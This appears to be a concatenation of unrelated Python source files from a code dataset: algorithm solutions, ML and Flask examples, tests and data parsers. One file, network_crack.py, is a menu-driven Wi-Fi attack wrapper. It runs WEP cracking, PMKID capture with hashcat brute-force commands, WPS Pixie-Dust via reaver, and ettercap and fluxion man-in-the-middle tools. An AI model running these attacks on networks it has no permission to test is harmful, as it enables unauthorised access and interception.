node3 = TreeNode(3)\n node4 = TreeNode(4)\n node5 = TreeNode(5)\n node1.left = node2\n node1.right = node3\n node3.left = node4\n node3.right = node5\n print(s.HasSubtree(node1, node3))\n\n","sub_path":"树的字结构.py","file_name":"树的字结构.py","file_ext":"py","file_size_in_byte":1854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"135955056","text":"import os\nfrom colorama import Fore, Style\n\n\ninterface = input(Fore.CYAN + '[*]Enter interface to use: ' + Style.RESET_ALL)\nos.system('airmon-ng start ' + interface)\n\ndef wait():\n wait = input('PRESS ENTER TO CONTINUE')\n\ndef main():\n print(' _ __ __ ______ ______ __')\n print(' / | / /__ / /_ / ____/____/ ____ \\_____/ /__')\n print(' / |/ / _ \\/ __/ / / / ___/ / __ `/ ___/ //_/')\n print(' / /| / __/ /_ / /___/ / / / /_/ / /__/ ,<')\n print(' /_/ |_/\\___/\\__/____\\____/_/ \\ \\__,_/\\___/_/|_|')\n print(' /_____/ \\____/')\n print('==========================================================')\n print('*[1] Scan Local Networks (Airodump-ng) *')\n print('*[2] Scan Local Networks (Wash) *')\n print('*[3] Crack WEP Network *')\n print('*[4] Crack WPA/WPA2 Network Using PMKID Method *')\n print('*[5] Crack WPA/WPA2 Network Using PIN (Pixie-Dust) Method*')\n print('*[6] Wifite2 (Automated Network Cracker) *')\n print('*[7] Ettercap (MiTM Attack) *')\n print('*[8] Fluxion (MiTM/Router Spoof Attack) *')\n print('*[9] Exit *')\n print('==========================================================')\n in_put = input(': ')\n if in_put == '1':\n print(Fore.CYAN + '[*]Make sure to note down network bssid and channel number...')\n print('[*]Enter ^C or ^Z to exit scanner mode...' + Style.RESET_ALL)\n os.system('airodump-ng ' + interface + 'mon')\n wait()\n main()\n if in_put == '2':\n print(Fore.CYAN + '[*]Make sure to note down network bssid and channel number...')\n print('[*]Enter ^C or ^Z to exit scanner mode...' + Style.RESET_ALL)\n os.system('wash -i ' + interface + 'mon')\n wait()\n main()\n if in_put == '3':\n bssid = input(Fore.CYAN + '[*]Enter WEP Network BSSID: ' + Style.RESET_ALL)\n channel = input(Fore.CYAN + '[*]Enter WEP Network Channel: ' + Style.RESET_ALL)\n print(Fore.CYAN + '[*]Gathering Packets From Network: ' + bssid + '... (Wait Until You Have About 1000 IVs)' + Style.RESET_ALL)\n os.system('besside-ng -b ' + bssid + ' -c ' + channel + ' ' + interface + 'mon')\n os.system('aircrack-ng wep.pcap')\n wait()\n main()\n if in_put == '4':\n adapt = input(Fore.CYAN + '[*]Do you have a wifi adapter with packet injection?[y/N]: ' + Style.RESET_ALL)\n if adapt == 'y' or adapt == 'Y':\n bssid = input(Fore.CYAN + '[*]Enter WPA/WPA2 Network BSSID: ' + Style.RESET_ALL)\n channel = input(Fore.CYAN + '[*]Enter WPA/WPA2 Network Channel: ' + Style.RESET_ALL)\n print(Fore.CYAN + '[*]Starting PMKID Attack...')\n print('[*]Wait about 10 minutes to gather enough packets, use ^C or ^Z to end hcxdumptool...' + Style.RESET_ALL)\n os.system('hcxdumptool -i ' + interface + 'mon -o output.pcapng --enable_status=1')\n print(Fore.CYAN + '[*]Converting output.pcapng to ouputHC.16800 for hashcat bruteforcing...' + Style.RESET_ALL)\n os.system('hcxpcaptool -E essidlist -I identitylist -U usernamelist -z outputHC.18600 output.pcapng')\n print(Fore.GREEN + '[+]File Converted! Use hashcat in these two methods to crack: ' + Style.RESET_ALL)\n print(Fore.CYAN + ' [*] Wordlist: hashcat -m 16800 outputHC.16800 -a 0 --force wordlist.lst -O')\n print(Fore.CYAN + ' [*]Bruteforce: hashcat -m 16800 outputHC.16800 -a 3 --force ?a?a?a?a?a?a -O')\n wait()\n main()\n else:\n print(Fore.RED + \"[*]You can't attack a WPA/WPA2 encrypted network without packet injection...\" + Style.RESET_ALL)\n wait()\n main()\n if in_put == '5':\n bssid = input(Fore.CYAN + '[*]Enter Network BSSID: ' + Style.RESET_ALL)\n channel = input(Fore.CYAN + '[*]Enter Network Channel: ' + Style.RESET_ALL)\n print(Fore.CYAN + '[*]Running Reaver to attack WPS PIN exploit...' + Style.RESET_ALL)\n os.system('reaver -i ' + interface + 'mon -b ' + bssid + ' -c ' + channel + ' -vv -Z')\n wait()\n main()\n if in_put == '6':\n print(Fore.CYAN + '[*]Starting Wifite2...' + Style.RESET_ALL)\n try:\n os.chdir('wifite2')\n os.system('python3 Wifite.py')\n print(Fore.GREEN + '[+]Successfully ran wifite.py!' + Style.RESET_ALL)\n except:\n print(Fore.RED + '[*]Error running wifite.py' + Style.RESET_ALL)\n os.chdir('..')\n main()\n if in_put == '7':\n got = input(Fore.CYAN + '[*]Do you want to run ettercap in Graphical or Text mode?[G/T]: ' + Style.RESET_ALL)\n try:\n if got == 'G':\n print(Fore.CYAN + '[*]Running ettercap in graphical mode...' + Style.RESET_ALL)\n os.system('sudo ettercap -G')\n print(Fore.GREEN + '[+]Successfully ended ettercap in graphical mode!' + Style.RESET_ALL)\n else:\n print(Fore.CYAN + '[*]Running ettercap in text mode...' + Style.RESET_ALL)\n os.system('sudo ettercap -T')\n print(Fore.GREEN + '[+]Successfully ended ettercap in text mode!' + Style.RESET_ALL)\n except:\n print(Fore.RED + '[*]Error running ettercap!' + Style.RESET_ALL)\n wait()\n main()\n if in_put == '8':\n print(Fore.CYAN + '[*]Starting Fluxion...' + Style.RESET_ALL)\n try:\n os.chdir('fluxion')\n os.system('./fluxion.sh')\n print(Fore.GREEN + '[+]Successfully ran fluxion.sh!' + Style.RESET_ALL)\n except:\n print(Fore.RED + '[*]Error running fluxion.sh' + Style.RESET_ALL)\n os.chdir('..')\n main()\n if in_put == '9':\n exit()\n\nmain()\n","sub_path":"network_crack.py","file_name":"network_crack.py","file_ext":"py","file_size_in_byte":5533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"330079464","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nfrom leetcode.Util import ListNode\nfrom leetcode import Util\nimport heapq\n\n\nclass Solution:\n def mergeKLists(self, lists):\n h = [(node.val, id(node), node) for node in lists if node is not None]\n if len(h) == 0:\n return None\n heapq.heapify(h)\n head = ListNode(0)\n cur = head\n while h:\n val, i, node = heapq.heappop(h)\n cur.next = node\n cur = node\n node = node.next\n if node:\n heapq.heappush(h, (node.val, id(node), node))\n return head.next\n\n\ns = Solution()\nprint(s.mergeKLists([Util.createListNode([1, 4, 5]),\n Util.createListNode([1, 3, 4]),\n Util.createListNode([2, 6])]))\n","sub_path":"leetcode/2021/merge-k-sorted-lists.py","file_name":"merge-k-sorted-lists.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"80391879","text":"import tensorflow as tf\nimport tensorflow.examples.tutorials.mnist.input_data as input_data\nfrom com.kailin.api_image import api_image\nfrom com.kailin.tensorflow.api_tensorflow import api_tensorflow as api_tf\nfrom time import time\n\nmnist = input_data.read_data_sets(\"mnist_data/\", one_hot=True)\n# print(\"train\", mnist.train.num_examples)\n# print(\"validation\", mnist.validation.num_examples)\n# print(\"test\", mnist.test.num_examples)\n# api_image.showImageLabelPredictionHot(mnist.train.images, mnist.train.labels, [], 0)\n# api_image.showImageLabelPredictionHot(mnist.validation.images, mnist.validation.labels, [], 0)\n# api_image.showImageLabelPredictionHot(mnist.test.images, mnist.test.labels, [], 0)\n\n# 建立神經網路\nx = tf.placeholder(\"float\", [None, 784])\nh1 = api_tf.layer(dim_in=784, dim_out=256, inputs=x, activation=tf.nn.relu)\nh2 = api_tf.layer(dim_in=256, dim_out=64, inputs=h1)\ny_predict = api_tf.layer(dim_in=64, dim_out=10, inputs=h2)\n# 定義訓練方式\ny_label = tf.placeholder(\"float\", [None, 10])\nloss_function = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=y_predict, labels=y_label))\noptimizer_function = tf.train.AdamOptimizer(learning_rate=0.001).minimize(loss_function)\n# 評估模型準確率\ncorrect_predcit = tf.equal(tf.argmax(y_label, 1), tf.argmax(y_predict, 1))\n# 將預測結果進行平均\naccuracy = tf.reduce_mean(tf.cast(correct_predcit, \"float\"))\n\ntrainEpochs = 15\nbatchSize = 100\nloss_list = []\nepoch_list = []\naccuracy_list = []\n\nwith tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n for epoch in range(trainEpochs):\n startTime = time()\n # 分批訓練\n for i in range(int(mnist.train.num_examples / batchSize)):\n batch_x, batch_y = mnist.train.next_batch(batchSize)\n sess.run(optimizer_function, feed_dict={x: batch_x, y_label: batch_y})\n loss, acc = sess.run([loss_function, accuracy],\n feed_dict={x: mnist.validation.images, y_label: mnist.validation.labels})\n epoch_list.append(epoch)\n loss_list.append(loss)\n accuracy_list.append(acc)\n print(\"Train Epoch=\", \"%02d\" % (epoch + 1),\n \"Train Time=\", time() - startTime,\n \"Loss=\", \"{:.9f}\".format(loss),\n \"Accuracy=\", acc)\n print(\"Accuracy\", sess.run(accuracy, feed_dict={x: mnist.test.images, y_label: mnist.test.labels}))\n prediction = sess.run(tf.argmax(y_predict, 1), feed_dict={x: mnist.test.images})\n api_image.showImageLabelPredictionHot(mnist.test.images, mnist.test.labels, prediction, 0)\n","sub_path":"tensorflow/com/kailin/tensorflow/t03.py","file_name":"t03.py","file_ext":"py","file_size_in_byte":2586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"447374821","text":"import math\nimport os\nfrom collections import deque\nfrom itertools import count\n\ndef add_marble(marble, circle):\n circle.rotate(-1)\n circle.append(marble)\n return circle\n\ndef score_marble(marble, circle):\n circle.rotate(7)\n removed = circle.pop()\n circle.rotate(-1)\n return (marble, removed)\n\ndef scores():\n circle = deque((0,))\n for marble in count(1):\n if (marble % 23) == 0:\n yield score_marble(marble, circle)\n else:\n circle = add_marble(marble, circle)\n\ndef high_score_with_caching():\n cached_scores = list()\n score_generator = scores()\n\n def high_score(players, marbles):\n no_of_scores = math.floor(marbles/23)\n\n while len(cached_scores) < no_of_scores:\n cached_scores.append(next(score_generator))\n\n player_scores = dict()\n for score in [s for s in cached_scores if s[0] <= marbles]:\n player = (score[0] - 1) % players\n player_scores[player] = (player_scores.get(player, ()) + score)\n\n return max(sum(player) for player in player_scores.values())\n\n return high_score\n\nhigh_score = high_score_with_caching()\n\ndef main():\n with open(os.path.join(os.path.dirname(__file__), 'input.txt'), 'r') as f:\n input = f.read().strip().split(' ')\n players, last_marble = int(input[0]), int(input[6])\n print('part one: ', high_score(players, last_marble))\n print('part two: ', high_score(players, last_marble*100))\n\nif __name__ == '__main__':\n main()\n","sub_path":"09/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":1512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"331196962","text":"\"\"\"\nAuthor: Xiangyi Luo\n\nParsing information of stackoverflow dump\n\"\"\"\n\nimport xml.etree.ElementTree as ET\nimport re\nimport csv\n\ndata_path = './../dataset/stackoverflow/Posts.xml'\n\nparsed_data = []\n# id, type, parent-id, score, text, code\nparsed_data_path = 'parsed_stackoverflow.csv'\nparsed_data_file = open(parsed_data_path, 'w+')\nwr = csv.writer(parsed_data_file, quoting=csv.QUOTE_ALL)\nwr.writerow(['id', 'type', 'parent_id', 'score', 'text', 'code'])\n\ni = 0\nmax_post = 50000\nfor event, elem in ET.iterparse(data_path):\n if i > max_post:\n break\n\n if elem.tag == 'row':\n if elem.attrib['PostTypeId'] == '1' and re.search('android', elem.attrib['Tags']):\n # print('=====')\n # print(elem.attrib)\n\n tags = re.findall(r'<.+?>', elem.attrib['Tags'])\n tags = ','.join(list(map(lambda x: x.replace('<', '').replace('>', ''), tags)))\n\n # print(tags)\n\n api = re.sub(r'-\\d+\\.*\\d*', '', tags)\n api = list(set(re.split(r',|-|\\.', api)))\n\n # print(api)\n\n if 'android' in api:\n api.remove('android')\n api = ','.join(api)\n\n text = re.findall(r'

.+?

', elem.attrib['Body'], re.DOTALL)\n text = ' '.join(list(map(lambda x: re.sub(\n r'<.+?>|http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\\(\\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', '', x), text)))\n\n # print(text)\n\n # methods = re.findall(r'\\w+\\(\\)', text)\n # methods = ','.join(list(set(map(lambda x: re.sub(r'\\(\\)', '', x), methods))))\n\n code = re.findall(r'
(.+?)
', elem.attrib['Body'], re.DOTALL)\n code = ' '.join(list(map(lambda x: re.sub(r'\\s+', ' ', x), code)))\n\n record = [elem.attrib['Id'], int(elem.attrib['PostTypeId']), -1, int(elem.attrib['Score']), text, code]\n # parsed_data.append(record)\n wr.writerow(record)\n print(i)\n i = i + 1\n elem.clear()\n\n # elif elem.attrib['PostTypeId'] == '2':\n # # print('=====')\n # # print(elem.attrib)\n #\n # text = re.findall(r'

.+?

', elem.attrib['Body'], re.DOTALL)\n # text = ' '.join(list(map(lambda x: re.sub(\n # r'<.+?>|http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\\(\\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', '', x), text)))\n # code = re.findall(r'
(.+?)
', elem.attrib['Body'], re.DOTALL)\n # code = ' '.join(list(map(lambda x: re.sub(r'\\s+', ' ', x), code)))\n #\n # record = [elem.attrib['Id'], int(elem.attrib['PostTypeId']), elem.attrib['ParentId'], int(elem.attrib['Score']), text, code]\n # # parsed_data.append(record)\n # wr.writerow(record)\n\n\n\nparsed_data_file.close()\n\n","sub_path":"knowledge_retrieval_code/stackoverflow_parser.py","file_name":"stackoverflow_parser.py","file_ext":"py","file_size_in_byte":2895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"208009483","text":"# -*- encoding: utf-8\n\nimport datetime as dt\n\nimport pytest\n\nfrom cloudwatch_alarms import build_cloudwatch_url, ThresholdMessage\n\n\nclass TestThresholdMessage:\n @pytest.mark.parametrize(\n \"message, actual_value\",\n [\n (\n \"Threshold Crossed: 1 datapoint [1.0 (05/02/18 06:28:00)] was greater than the threshold (1.0).\",\n 1,\n ),\n (\n \"Threshold Crossed: 1 datapoint [12.0 (05/02/18 06:28:00)] was greater than the threshold (1.0).\",\n 12,\n ),\n ],\n )\n def test_actual_value(self, message, actual_value):\n t = ThresholdMessage.from_message(message)\n assert t.actual_value == actual_value\n\n @pytest.mark.parametrize(\n \"message, desired_value\",\n [\n (\n \"Threshold Crossed: 1 datapoint [1.0 (05/02/18 06:28:00)] was greater than the threshold (1.0).\",\n 1,\n ),\n (\n \"Threshold Crossed: 1 datapoint [1.0 (05/02/18 06:28:00)] was greater than the threshold (12.0).\",\n 12,\n ),\n (\n \"Threshold Crossed: 1 datapoint [1.0 (05/02/18 06:28:00)] was greater than the threshold (0.0).\",\n 0,\n ),\n (\n \"Threshold Crossed: 1 datapoint [1.0 (06/04/18 13:26:00)] was less than the threshold (1.5).\",\n 1.5,\n ),\n ],\n )\n def test_desired_value(self, message, desired_value):\n t = ThresholdMessage.from_message(message)\n assert t.desired_value == desired_value\n\n @pytest.mark.parametrize(\n \"message, expected_date\",\n [\n (\n \"Threshold Crossed: 1 datapoint [1.0 (05/02/18 06:28:00)] was greater than the threshold (1.0).\",\n dt.datetime(2018, 2, 5, 6, 28, 0),\n ),\n (\n \"Threshold Crossed: 1 datapoint [1.0 (11/08/18 10:55:00)] was greater than the threshold (1.0).\",\n dt.datetime(2018, 8, 11, 10, 55, 0),\n ),\n (\n \"Threshold Crossed: 1 datapoint [1.0 (09/01/18 10:36:31)] was greater than the threshold (1.0).\",\n dt.datetime(2018, 1, 9, 10, 36, 31),\n ),\n ],\n )\n def test_date(self, message, expected_date):\n t = ThresholdMessage.from_message(message)\n assert t.date == expected_date\n\n @pytest.mark.parametrize(\n \"message, expected_operator\",\n [\n (\n \"Threshold Crossed: 1 datapoint [1.0 (05/02/18 06:28:00)] was greater than the threshold (1.0).\",\n \"greater than\",\n ),\n (\n \"Threshold Crossed: 1 datapoint [1.0 (05/02/18 06:28:00)] was greater than or equal to the threshold (1.0).\",\n \"greater than or equal to\",\n ),\n (\n \"Threshold Crossed: 1 datapoint [1.0 (05/02/18 06:28:00)] was less than the threshold (1.0).\",\n \"less than\",\n ),\n (\n \"Threshold Crossed: 1 datapoint [1.0 (05/02/18 06:28:00)] was less than or equal to the threshold (1.0).\",\n \"less than or equal to\",\n ),\n ],\n )\n def test_operator(self, message, expected_operator):\n t = ThresholdMessage.from_message(message)\n assert t.operator == expected_operator\n\n @pytest.mark.parametrize(\"bad_message\", [\"foo\", \"not a real message\"])\n def test_unexpected_message_is_valueerror(self, bad_message):\n with pytest.raises(ValueError):\n ThresholdMessage.from_message(bad_message)\n\n @pytest.mark.parametrize(\n \"message, is_breaching\",\n [\n (\n \"Threshold Crossed: 1 datapoint [1.0 (05/02/18 06:28:00)] was greater than the threshold (1.0).\",\n False,\n ),\n (\n \"Threshold Crossed: no datapoints were received for 1 period and 1 missing datapoint was treated as [Breaching].\",\n True,\n ),\n ],\n )\n def test_is_breaching(self, message, is_breaching):\n t = ThresholdMessage.from_message(message)\n assert t.is_breaching == is_breaching\n\n\ndef test_build_cloudwatch_url():\n url = build_cloudwatch_url(\n search_term=\"HTTP500\",\n log_group_name=\"platform/loris\",\n start_date=dt.datetime(2018, 3, 5, 6, 28, 0),\n end_date=dt.datetime(2018, 3, 5, 6, 34, 0),\n region=\"us-east-1\",\n )\n assert url == (\n \"https://us-east-1.console.aws.amazon.com/cloudwatch/home\"\n \"?region=us-east-1#logEventViewer:group=platform/loris;\"\n \"filter=HTTP500;start=2018-03-05T06:28:00Z;end=2018-03-05T06:34:00Z;\"\n )\n","sub_path":"monitoring/post_to_slack/src/test_cloudwatch_alarms.py","file_name":"test_cloudwatch_alarms.py","file_ext":"py","file_size_in_byte":4775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"19780002","text":"from django.test import SimpleTestCase\n\nfrom ..serializers import ExcListUMIDSerializer, ExcListKeySerializer\n\n\nclass UMIDSerializerTests(SimpleTestCase):\n\n # Test validation\n def test_valid_data(self):\n umid = '00123400' # leading and trailing zeroes\n serializer = ExcListUMIDSerializer(data={\n 'umid': umid,\n })\n self.assertTrue(serializer.is_valid())\n self.assertEqual(serializer.validated_data['umid'], umid)\n\n # Test for all required fields\n def test_blank_data(self):\n serializer = ExcListUMIDSerializer(data={})\n self.assertFalse(serializer.is_valid())\n self.assertEqual(serializer.errors['umid'], ['This field is required.'])\n\n # Test for invalid data\n def test_invalid_data(self):\n serializer = ExcListUMIDSerializer(data={\n 'umid': 'abc123',\n })\n self.assertFalse(serializer.is_valid())\n self.assertEqual(serializer.errors['umid'], ['Enter a valid UMID.'])\n\n\nclass KeySerializerTests(SimpleTestCase):\n\n # Test validation\n def test_valid_data(self):\n key = '00-this-is-my-key-00' # leading and trailing zeroes\n serializer = ExcListKeySerializer(data={\n 'key': key,\n })\n self.assertTrue(serializer.is_valid())\n self.assertEqual(serializer.validated_data['key'], key)\n\n # Test for all required fields\n def test_blank_data(self):\n serializer = ExcListKeySerializer(data={})\n self.assertFalse(serializer.is_valid())\n self.assertEqual(serializer.errors['key'], ['This field is required.'])\n\n","sub_path":"api/tests/test_serializers.py","file_name":"test_serializers.py","file_ext":"py","file_size_in_byte":1604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"304167217","text":"# To build an API endpoint, we need to define a class \n# that inherits from flask_restful.Resource\n\nfrom flask import request\nfrom flask_restful import Resource\nfrom http import HTTPStatus\nfrom models.recipe import Recipe, recipe_list\n\n# We need to create three resources: RecipeListResource,\n# RecipeResource, and RecipePublishResource\n\nclass RecipeListResource(Resource):\n # Add the get metho\n def get(self):\n data = []\n for recipe in recipe_list:\n if recipe.is_publish is True:\n data.append(recipe.data)\n return {'data': data}, HTTPStatus.OK\n\n# Add the post method\n def post(self):\n data = request.get_json()\n recipe = Recipe(name=data['name'],\n description=data['description'],\n num_of_servings=data['num_of_servings'],\n cook_time=data['cook_time'],\n directions=data['directions'])\n recipe_list.append(recipe)\n return recipe.data, HTTPStatus.CREATED\n\n# define the recipe resource\nclass RecipeResource(Resource):\n def get(self, recipe_id):\n recipe = next((recipe for recipe in recipe_list if recipe.id == recipe.id and \n recipe.is_publish == True), None)\n if recipe is None:\n return {'message': 'recipe not found'}, HTTPStatus.NOT_FOUND\n return recipe.data, HTTPStatus.OK\n\n # Implement the put method\n def put(self, recipe_id):\n data = request.get_json()\n recipe = recipe = next((recipe for recipe in recipe_list if recipe.id == recipe_id), None)\n\n if recipe is None:\n return {'message': 'recipe not found'}, HTTPStatus.NOT_FOUND\n recipe.name = data['name']\n recipe.description = data['description']\n recipe.num_of_servings = data['num_of_servings']\n recipe.cook_time = data['cook_time']\n recipe.directions = data['directions']\n return recipe.data, HTTPStatus.OK\n\n # delete recipe\n def delete(self, recipe_id):\n recipe = next((recipe for recipe in recipe_list if recipe.id == recipe_id), None)\n if recipe is None:\n return {'message': 'recipe not found'}, HTTPStatus.NOT_FOUND\n #recipe.is_publish = False\n recipe_list.remove(recipe)\n return {}, HTTPStatus.NO_CONTENT\n \n\n# Define the RecipePublic resource and implement the put method \n# RecipePublishResource inherits from flask_restful.Resource\nclass RecipePublishResource(Resource):\n# finds the recipe with the passed-in recipe_id and update the is_publish status to true.\n def put(self, recipe_id):\n recipe = next((recipe for recipe in recipe_list if recipe.id == recipe_id), None)\n if recipe is None:\n return {'message': 'recipe not found'}, HTTPStatus.NOT_FOUND\n # shows that the recipe has been published successfully.\n recipe.is_publish = True\n return{}, HTTPStatus.NO_CONTENT\n\n # Implement the delete method\n def delete(self, recipe_id):\n recipe = next((recipe for recipe in recipe_list if recipe.id == recipe_id), None)\n if recipe is None:\n return {'message': 'recipe not found'}, HTTPStatus.NOT_FOUND\n recipe.is_publish = False\n return {}, HTTPStatus.NO_CONTENT\n\n\n\n","sub_path":"Smilecook/resources/recipe.py","file_name":"recipe.py","file_ext":"py","file_size_in_byte":3318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"477303409","text":"\"\"\"\nExtracts LEGI tar archives into an SQLite DB\n\"\"\"\n\nfrom argparse import ArgumentParser\nfrom collections import defaultdict\nfrom fnmatch import fnmatch\nimport json\nimport os\nimport re\n\nimport libarchive\nfrom lxml import etree\n\ntry:\n from tqdm import tqdm\nexcept ImportError:\n print('[warning] tqdm is not installed, the progress bar is disabled')\n tqdm = lambda x: x\n\nfrom .anomalies import detect_anomalies\nfrom .db import connect_db\nfrom .html import CleaningError, clean_html, remove_detected_soft_hyphens\nfrom .utils import partition\n\n\nSOUS_DOSSIER_MAP = {\n 'articles': 'article',\n 'sections': 'section_ta',\n 'textes_structs': 'texte/struct',\n 'textes_versions': 'texte/version',\n}\n\n\ndef innerHTML(e):\n r = etree.tostring(e, encoding='unicode', with_tail=False)\n return r[r.find('>')+1:-len(e.tag)-3]\n\n\ndef suppress(get_table, db, liste_suppression):\n counts = defaultdict(int)\n for path in liste_suppression:\n parts = path.split('/')\n assert parts[0] == 'legi'\n row_cid = parts[11]\n row_id = parts[-1]\n assert len(row_id) == 20\n table = get_table(parts)\n sous_dossier = SOUS_DOSSIER_MAP[table]\n db.run(\"\"\"\n DELETE FROM {0}\n WHERE dossier = ?\n AND cid = ?\n AND id = ?\n \"\"\".format(table), (parts[3], row_cid, row_id))\n changes = db.changes()\n if changes:\n counts['delete from ' + table] += changes\n # Also delete derivative data\n if table in ('articles', 'textes_versions'):\n db.run(\"\"\"\n DELETE FROM liens\n WHERE src_id = ? AND NOT _reversed\n OR dst_id = ? AND _reversed\n \"\"\", (row_id, row_id))\n counts['delete from liens'] += db.changes()\n elif table == 'sections':\n db.run(\"\"\"\n DELETE FROM sommaires\n WHERE cid = ?\n AND parent = ?\n AND _source = 'section_ta_liens'\n \"\"\", (row_cid, row_id))\n counts['delete from sommaires'] += db.changes()\n elif table == 'textes_structs':\n db.run(\"\"\"\n DELETE FROM sommaires\n WHERE cid = ?\n AND _source = 'struct/' || ?\n \"\"\", (row_cid, row_id))\n counts['delete from sommaires'] += db.changes()\n # And delete the associated row in textes_versions_brutes if it exists\n if table == 'textes_versions':\n db.run(\"DELETE FROM textes_versions_brutes WHERE id = ?\", (row_id,))\n counts['delete from textes_versions_brutes'] += db.changes()\n # If the file had an older duplicate that hasn't been deleted then\n # we have to fall back to that, otherwise we'd be missing data\n older_file = db.one(\"\"\"\n SELECT *\n FROM duplicate_files\n WHERE id = ?\n AND sous_dossier = ?\n ORDER BY mtime DESC\n LIMIT 1\n \"\"\", (row_id, sous_dossier), to_dict=True)\n if older_file:\n db.run(\"\"\"\n DELETE FROM duplicate_files\n WHERE dossier = ?\n AND cid = ?\n AND sous_dossier = ?\n AND id = ?\n \"\"\", (older_file['dossier'], older_file['cid'], sous_dossier, older_file['id']))\n counts['delete from duplicate_files'] += db.changes()\n for table, rows in json.loads(older_file['data']).items():\n if isinstance(rows, dict):\n rows['id'] = older_file['id']\n rows['cid'] = older_file['cid']\n rows['dossier'] = older_file['dossier']\n rows['mtime'] = older_file['mtime']\n rows = (rows,)\n for row in rows:\n db.insert(table, row)\n counts['insert into ' + table] += len(rows)\n else:\n # Remove the file from the duplicates table if it was in there\n db.run(\"\"\"\n DELETE FROM duplicate_files\n WHERE dossier = ?\n AND cid = ?\n AND sous_dossier = ?\n AND id = ?\n \"\"\", (parts[3], row_cid, sous_dossier, row_id))\n counts['delete from duplicate_files'] += db.changes()\n total = sum(counts.values())\n print(\"made\", total, \"changes in the database based on liste_suppression_legi.dat:\",\n json.dumps(counts, indent=4, sort_keys=True))\n\n\ndef process_archive(db, archive_path, raw, process_links=True, check_html=True):\n\n # Define some constants\n ARTICLE_TAGS = set('NOTA BLOC_TEXTUEL'.split())\n SECTION_TA_TAGS = set('TITRE_TA COMMENTAIRE'.split())\n TEXTELR_TAGS = set('VERSIONS'.split())\n TEXTE_VERSION_TAGS = set('VISAS SIGNATAIRES TP NOTA ABRO RECT'.split())\n META_ARTICLE_TAGS = set('NUM ETAT DATE_DEBUT DATE_FIN TYPE'.split())\n META_CHRONICLE_TAGS = set(\"\"\"\n NUM NUM_SEQUENCE NOR DATE_PUBLI DATE_TEXTE DERNIERE_MODIFICATION\n ORIGINE_PUBLI PAGE_DEB_PUBLI PAGE_FIN_PUBLI\n \"\"\".split())\n META_VERSION_TAGS = set(\n 'TITRE TITREFULL ETAT DATE_DEBUT DATE_FIN AUTORITE MINISTERE'.split()\n )\n TABLES_MAP = {'ARTI': 'articles', 'SCTA': 'sections', 'TEXT': 'textes_'}\n TYPELIEN_MAP = {\n \"ABROGATION\": \"ABROGE\",\n \"ANNULATION\": \"ANNULE\",\n \"CODIFICATION\": \"CODIFIE\",\n \"CONCORDANCE\": \"CONCORDE\",\n \"CREATION\": \"CREE\",\n \"DEPLACE\": \"DEPLACEMENT\",\n \"DISJOINT\": \"DISJONCTION\",\n \"MODIFICATION\": \"MODIFIE\",\n \"PEREMPTION\": \"PERIME\",\n \"RATIFICATION\": \"RATIFIE\",\n \"TRANSFERE\": \"TRANSFERT\",\n }\n TYPELIEN_MAP.update([(v, k) for k, v in TYPELIEN_MAP.items()])\n\n # Define some shortcuts\n attr = etree._Element.get\n insert = db.insert\n update = db.update\n\n def get_table(parts):\n table = TABLES_MAP[parts[-1][4:8]]\n if table == 'textes_':\n table += parts[13] + 's'\n return table\n\n soft_hyphens = defaultdict(list)\n def scrape_tags(attrs, root, wanted_tags, unwrap=False, clean=False):\n for e in root:\n if e.tag not in wanted_tags:\n continue\n col = e.tag.lower()\n html = innerHTML(e[0] if unwrap else e)\n if clean and not raw:\n try:\n html = clean_html(html, check=check_html)\n except CleaningError as e:\n print()\n print('=' * 70)\n print(f\"Cleaning column {col!r} of row {row_id!r} failed:\")\n print(str(e))\n print()\n attrs[col] = html or None\n if '\\u00AD' in html:\n soft_hyphens[row_cid].append((table, row_id, col, html))\n\n counts = defaultdict(int)\n skipped = 0\n unknown_folders = {}\n liste_suppression = []\n xml = etree.XMLParser(remove_blank_text=True)\n with tqdm(total=os.stat(archive_path).st_size, unit='bytes') as pbar, \\\n open(archive_path, 'rb') as file, \\\n libarchive.stream_reader(file) as archive:\n for entry in archive:\n path = entry.pathname\n if type(path) is bytes:\n path = path.decode('latin-1')\n if path[-1] == '/':\n continue\n parts = path.split('/')\n if parts[-1] == 'liste_suppression_legi.dat':\n liste_suppression += b''.join(entry.get_blocks()).decode('ascii').split()\n continue\n if parts[1] == 'legi':\n path = path[len(parts[0])+1:]\n parts = parts[1:]\n if not parts[2].startswith('code_et_TNC_'):\n # https://github.com/Legilibre/legi.py/issues/23\n try:\n unknown_folders[parts[2]] += 1\n except KeyError:\n unknown_folders[parts[2]] = 1\n continue\n dossier = parts[3]\n row_cid = parts[11]\n row_id = parts[-1][:-4]\n mtime = entry.mtime\n\n # Skip the file if it hasn't changed, store it if it's a duplicate\n duplicate = False\n table = get_table(parts)\n prev_row = db.one(\"\"\"\n SELECT mtime, dossier, cid\n FROM {0}\n WHERE id = ?\n \"\"\".format(table), (row_id,))\n if prev_row:\n prev_mtime, prev_dossier, prev_cid = prev_row\n if prev_dossier != dossier or prev_cid != row_cid:\n if prev_mtime >= mtime:\n duplicate = True\n else:\n prev_row_dict = db.one(\"\"\"\n SELECT *\n FROM {0}\n WHERE id = ?\n \"\"\".format(table), (row_id,), 